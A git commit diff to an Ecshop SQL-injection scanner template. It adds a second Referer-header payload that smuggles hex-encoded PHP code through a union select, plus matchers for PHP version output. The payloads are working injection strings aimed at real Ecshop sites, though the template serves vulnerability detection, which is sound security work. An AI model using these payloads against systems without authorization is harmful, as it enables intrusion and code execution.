Update ecshop-sqli.yaml
parent
cf1a9724f4
commit
d8fdb31b1b
|
@ -2,12 +2,13 @@ id: ecshop-sqli
|
|||
|
||||
info:
|
||||
name: Ecshop SQLi
|
||||
author: Lark-lab,ImNightmaree
|
||||
author: Lark-lab,ImNightmaree,ritikchaddha
|
||||
severity: high
|
||||
description: A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field.
|
||||
reference:
|
||||
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
|
||||
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
||||
- http://www.wins21.com/mobile/blog/blog_view.html?num=1172
|
||||
tags: sqli,php,ecshop
|
||||
|
||||
requests:
|
||||
|
@ -18,6 +19,13 @@ requests:
|
|||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
|
||||
|
||||
- |
|
||||
GET /user.php?act=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"'/*";}554fcae493e564ee0dc75bdf2ebf94ca
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
@ -26,3 +34,9 @@ requests:
|
|||
- '[0] => Array'
|
||||
- 'MySQL server error report:Array'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue